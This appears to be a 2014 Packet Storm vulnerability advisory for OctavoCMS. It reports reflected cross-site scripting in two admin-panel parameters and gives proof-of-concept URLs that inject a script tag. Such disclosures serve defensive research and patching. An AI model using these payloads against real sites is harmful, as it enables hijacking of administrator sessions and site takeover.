OctavoCMS Admin Panel Cross Site Scripting

2014-07-15T00:00:00
ID PACKETSTORM:127472
Type packetstorm
Reporter Hadi Arjmand
Modified 2014-07-15T00:00:00

Description

                                        
                                            `# Title : OctavoCMS Admin Panel Cross Site Scripting  
#  
# Vendor : http://octavocms.com/  
#  
# Date : 2014.07.10  
#  
#================================  
#   
# Proof of concept :   
#  
# First You should Login As Admin ...  
#  
#  
# ( 1 ) :   
#  
# http://TARGET/admin/media/add.php?action="><script>alert(/XSS/)</script>  
#  
# ( 2 ) :  
#  
# http://TARGET/admin/pages/permissions.php?dir="><script>alert(/XSS/)</script>  
#  
#================================  
#  
# Demo : http://demo.octavocms.com  
#  
#================================  
# Credit : Hadi Arjmand , SeCTime.Ir  
#================================  
`